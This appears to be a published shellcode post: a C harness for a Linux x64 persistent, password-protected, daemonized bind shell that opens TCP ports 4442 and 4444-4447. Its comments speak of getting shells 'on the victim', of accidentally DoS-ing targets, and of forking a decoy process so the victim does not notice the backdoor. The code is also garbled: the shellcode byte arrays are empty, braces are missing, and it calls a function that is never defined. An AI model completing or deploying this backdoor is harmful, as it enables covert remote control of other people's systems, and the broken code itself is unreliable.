Linux/x64 - Bind (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)











#include <stdio.h>
#include <string.h>

//| Exploit Title: [Syscall Persistent Bind Shell + (multi-terminal) + password + daemon (83, 148, 177 bytes)]
//| Date: [7/15/2016]
//| Exploit Author: [CripSlick]
//| Tested on: [Kali 2.0 x86_x64]
//| Version: [No Program Version, Only Syscalls Used]

//| OffSec ID: OS-20614

//|=============== CripSlick's Persistent Bind-Shell with Port-Range + password ============
//|	CODE 3 Has everything to offer that CODE2 has and more. CODE2 has everything to offer 
//|	that CODE1 has and more. CODE1 is still great due to being a very short bind shell.
//|	The point is that that there is really ONLY 1 shellcode here, it is just that CODE2 &
//|	CODE1 have less features to cut down on byte count giving you more options.
//|	Troubleshooting:
//|	1. Problem: A lot of ports appeared on "nmap <IPv4> -p-" but not my port?
//|	1. Answer:  This is common when you swap the high and low port
//|	2. Problem: I disconnected and can't reconnect (even when I use the right password)
//|	2. Answer:  This is common when re-executing the program (even after making changes)
//|		    Solve this by closing the terminal completly out, going to your directory
//|		    recompiling the program and then relaunching.
//|		    If it is because you typed in the password wrong, wait about 60 seconds to 
//|		    re-connect. No re-execution of the program is required to reconnect for
//|		    CODE2 & CODE3.
//|	3. Problem: I DoS'd the victim
//|	3. Answer:  This probably was because you set the port range too broad. A broad port range
//|		    takes a lot of CPU power. I suggest keeping it to how many terminals you need.

#define PORT 		"\x11\x5a"   // FORWARD BYTE ORDER
//|			PORT: 4442	
#define PASSWORD	"\x6c\x61\x20\x63\x72\x69\x70\x73" // FORWARD BYTE ORDER
//|			PASSWORD = "la crips"

#define HIGH_PORT	"\x5f\x11"   // REVERSE BYTE ORDER 
#define LOW_PORT	"\x5b\x11"   // REVERSE BYTE ORDER
//|			PORTS: 4443-4447 (remember 4443 doesn't count so 4444-4447)
//|					 (remember to use one terminal connection per open port)

//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!=======================
//| =========================================================================
//| CODE1 The short bind shell (83 bytes)
//| =========================================================================
//| This is the shortest bind-shell I could make. I leaned that mov byte takes
//| two bytes while Push+Pop takes 3 so I used more moves. Push+Pop is good if
//| you don't want to xor a register but your stack must be NULL on top.
//| This code only supports one terminal.

unsigned char CODE1[] = //replace CODE1 for both CODEX   <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!=======================
//| =========================================================================
//| CODE2 Persistent bind shell with a password (148 bytes)
//| =========================================================================
//| Supports re-connecting after a disconnect (close terminal and open up again)
//| If you type in a password wrong, wait 60 seconds to reconnect.
//| If you close the terminal after you enter the correct password, you can
//| immediatly reconnect.
//| This code only supports one terminal.

unsigned char CODE2[] = //replace CODE2 for both CODEX   <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!=======================
//| =========================================================================
//| CODE3 Persistent bind shell with multi-port/terminal + password (177 bytes)
//| =========================================================================
//| This bind shell has everything COD2 has to offer + more while only 29 bytes more
//| You will get as many terminals on the victim as your PORT-RANGE minus 1
//| Your lowest port will NOT be open (so minus 1 port/terminal from your range)
//| Example: ports 4440-4445 = ports 4441-4445 usable = 5 terminals on victim

unsigned char CODE3[] = //replace CODE3 for both CODEX   <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

//|========================== VOID SHELLCODE ===========================
//	This part floods the registers to make sure the shellcode will always run
	__asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
		"mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t" 
		"mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t" 
		"mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t" 
		"mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
		"call CODE3");  //1st CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>

//|========================== VOID printBytes ===========================
void printBytes()
printf("The CripSlick's code is %d Bytes Long\n",
		strlen(CODE3)); //2nd CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>

//|============================== Int main ================================
int main ()
//	IMPORTANT> replace CODEX  the "unsigned char" variable  below
//	> This needs to be done twice (for string count + code to use)

int pid = fork();  		// fork start
    if(pid == 0){ 		// pid always starts at 0
	SHELLCODE();		// launch void SHELLCODE
				// this is to represent a scenario where you bind to a good program
				// you always want your shellcode to run first	
	}else if(pid > 0){	// pid will always be greater than 0 after the 1st process
				// this argument will always be satisfied
	printBytes();		// launch printBYTES
				// pretend that this is the one the victim thinks he is only using
return 0;			// satisfy int main
system("exit");			// keeps our shellcode a daemon